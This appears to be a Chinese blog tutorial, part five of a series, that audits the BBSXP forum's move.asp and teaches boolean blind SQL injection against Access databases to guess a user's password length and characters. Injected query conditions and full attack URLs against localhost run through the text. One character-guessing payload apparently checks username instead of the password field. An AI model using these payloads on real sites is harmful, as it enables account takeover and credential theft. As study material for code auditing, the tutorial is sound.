BBSXP漏洞[倒着看5]

BBSXP漏洞[倒着看五]天知道我哪这么有空来慢慢写这些鬼东西，可能是因为无聊吧，或者是想赶快把这个恼人的系列结束掉。南京这里天气太热，躲在实验室里给导师看到在玩的话就糟糕了，于是只好装模做样的弄点事情来做，算是对得起实验室的经费吧。
  一到四朋友看了都说写得很糟糕，我一边看着他们摇头一边直冒汗，等他们摇完头我衣服都湿透了，只好勉强挤出一点笑容然后赶快跑掉。我知道他想说什么，但是我不想连续点上半个小时的头，那样的话不如回来写五。鉴于前面写得如此糟糕，我会尝试用另外的方法来写写。



  其实在有源代码的情况下找漏洞是很简单的，你需要付出的是一点点时间和细心。看代码有很顺利和不太顺利的时候，顺利的时候就像拉肚子，西里哗啦一会儿就看完找到问题了，不顺利的时候就像便秘，拖拖拉拉半天都看不了多少。这和代码写的质量也有关系，写得好的代码别人很容易接受，写得不好的代码看起来就是一场灾难。如果说代码是食物而看代码是吃饭的话，美妙的代码就应该像馊了的稀饭一样，别人一吃就拉。当然，胃是可以锻炼的，平时多看代码，即使像BBSXP一样坚如玄铁的代码，吃下去一样可以西里哗啦。
  比如我们要找SQL Injection的漏洞，自然会到生成SQL查询语句的代码中去搜寻。一般来说，满足两个条件的就可以：一、生成的SQL查询语句中包含我们提交的内容；二、提交的内容没有过滤或者是过滤不完全，像1.65a版move.asp行22：



sql="select * from forum where ID="&ID&" and forumid="&forumid&""



  里面有两个变量，都有可能满足上面的两个条件，往上看ID和forumid从何而来，行4、5：



ID=Request("ID")
forumid=Request("forumid")



  都是用户提交的，满足第一个条件。当然还要看看是否满足第二个条件，行6、7、8：



if isnumeric(""&forumid&"") = flase then
error("<li>非法操作")
end if



  这个是说forumid是检查了的，如果不是数字的话就会导致一个“非法操作”，但是我们看到代码里面并没有对ID进行检查，这就满足第二个条件了。事实上VB对变量的类型不是特别的严格，看起来ID好像应该是一个整型，但我们提交一个字符串型的ID也不会造成错误，真是很遗憾啊。
  依据数据库的类型，我们可以作出不同的攻击策略，如果是MSSQL，这是支持多语句查询的，而且可以利用存储过程，相对来说简单一点；如果是ACCESS，最多就只能在一个库里面跨表操作，且只支持单一语句查询，功能要弱一些，一般以猜测密码为最终的目的。其实对于MSSQL进行攻击也是很有趣的，有时候也会要一些很巧妙的技巧，不过鉴于大部分BBSXP都是用的ACCESS，就不讨论MSSQL下的攻击了。
  我们先看这样一句查询语句：



select * from forum where id=1 and 1=(select count(*) from user) and forumid=1



  执行这个就返回的结果来看，可以是空或者非空，关键在于where后面的条件。分开来看的话，可以是三个条件的合取范式，抛开id=1和forumid=1，来看看中间的一个条件：



1=(select count(*) from user)



  这个条件为真的话，整个范式就为真，也就是说查询后的返回集不为空，否则的话返回集就是一个空集。这个条件是说user表里面的列项是否为1，由于我们可以获知返回集的空与非空的情况，进一步就可以知道user表里面的列项是否为1了。一句话，上面的查询语句返回结果为空，就是说user表里有1个列，否则user表里面列项就不为1。
  这是很容易理解的，弄懂了这个，就可以构造条件来让对方回答是或者否了。猜谜码除了问你的密码是不是xxxxxxx以外，还可以问你的密码第x位是不是x，你的密码是不是一共有x位等等，我们就是这样猜出别人的密码的，打个比方，我们问，never的密码长度是不是7位啊，条件就这样写：



1=(select count(*) from user where username='never' and len(userpass)=7)



  要是猜对方的第a位密码是不是'x'，就这样构造条件：



1=(select count(*) from user where username='never' and right(left(username,a),1)='x')



  通过对方回答是还是不是就可以猜出来了。嗯，这仅仅是构造了条件，如果是完整的一个查询语句的话，应该是这样，我们还是完整的写出来，虽然有点长：



select * from forum where id=1 and 1=(select count(*) from user where username='never' and len(userpass)=7) and forumid=1



  这是问never的密码长度是不是7位的查询语句，比较一下move.asp第22行的那个语句，看出来id为什么的时候就成了上面一条了吗？



ID="1 and 1=(select count(*) from user where username='never' and len(userpass)=7)"
forumid=1



  于是我们又倒回来，只要提交上述的id和forumid值，不就可以慢慢的猜随便那个人的密码了吗？



  明白了道理，利用就简单了。按照对代码的分析，如果查询后的结果rs为空，后面调用了rs的属性，一定会报错，如果rs不为空，那么一切正常。换句话说，猜对了的话，看到的就是正常的信息，猜错了的话就会看到这样的错误：



"BOF 或 EOF 中有一个是“真”，或者当前的记录已被删除，所需的操作要求一个当前的记录。"



  实战演练一下，随便以一个人登陆，然后在地址栏中键入：



http://localhost/bbsxp/move.asp?forumid=1&id=1 and 1=(select count(*) from user where username='never' and len(userpass)=7)



  哗，返回了一个空白页，看代码就可以看到上面的错误信息，也就是说密码不是7位。再猜猜密码是不是9位。



http://localhost/bbsxp/move.asp?forumid=1&id=1 and 1=(select count(*) from user where username='never' and len(userpass)=9)



  哗，显示出来将帖子移动到什么地方的选项，没有错误信息，也就是说密码就是9位了。同样，下面就应该来慢慢的猜每一位的密码，自己可以试试？